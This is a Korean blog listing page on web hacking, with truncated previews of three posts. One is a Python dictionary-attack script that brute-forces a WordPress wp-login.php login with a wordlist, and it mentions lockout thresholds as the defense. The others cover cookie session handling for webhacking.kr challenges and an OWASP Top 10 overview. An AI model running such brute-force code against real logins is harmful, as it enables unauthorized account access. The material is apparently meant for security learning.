해킹&보안/웹 해킹 검색 결과

해당 글 5

[5] 패스워드 크래킹

패스워드 크래킹은 아이디를 이미 알고 있다는 가정하에 진행하며 사전대입 공격이므로 좋은 사전 파일을 미리 구해놓는 것이 좋다.이를 방지하기 위해서는 임계치를 설정해둬야한다.import urllib import urllib2 url = "http://server/wordpress/wp-login.php" id = "python" wordlist = open('wordlist.txt', 'r') passwords = wordlist.readlines() for password in passwords: password = password.strip() values = {'log' : id, 'pwd' : password} data = urllib.urlencode(values) request = urllib2..
해킹&보안/웹 해킹 2017. 6. 22. 16:45

[3] 쿠키정보 유지하기(urllib2)

import urllib import urllib2 #cookie 값 얻기 url = "http://webhacking.kr/index.html?enter=1" loginInfo={"id":"아이디", "pw":"암호"} loginInfo = urllib.urlencode(loginInfo) req = urllib2.Request(url, loginInfo) response = urllib2.urlopen(req) cookie = response.headers.get('Set-Cookie') #쿠키값 다시 적용시켜 세션 유지하기 url2 = "http://webhacking.kr/challenge/web/web-02/" req = urllib2.Request(url2) req.add_header('coo..
해킹&보안/웹 해킹 2017. 6. 21. 11:37

[1] 웹 해킹 개요

1. 웹 해킹의 개요 1) 개요 HTTP 프로토콜을 기반으로 하는 웹은 은 인터넷 서비스의 중심이며 대부분 80포트를 개방하여 사용하고 있다. URL 뒤에 별도의 포트를 지정하지 않으면 80포트를 사용하는 것으로 인식한다. 웹 서버는 80포트를 통해 텍스트, 이미지 등 다양한 자료들을 송수신하며 중요정보까지 웹 서버로 전송한다.OWASP(the Open Web Application Security Project)라는 국제 웹 보안 표준 기구에서는 10대 웹 애플리케이션 취약점(OWASP Top 10)을 발표한다. 2013년 OWASP top 10 목록은 다음과 같다.1. Injection- DB, 운영체제, LDAP에 명령어나 질의문을 전송할 때 신뢰할 수 없는 데이터를 사용함으로써 인젝션 공격을 수행...
해킹&보안/웹 해킹 2017. 5. 23. 00:01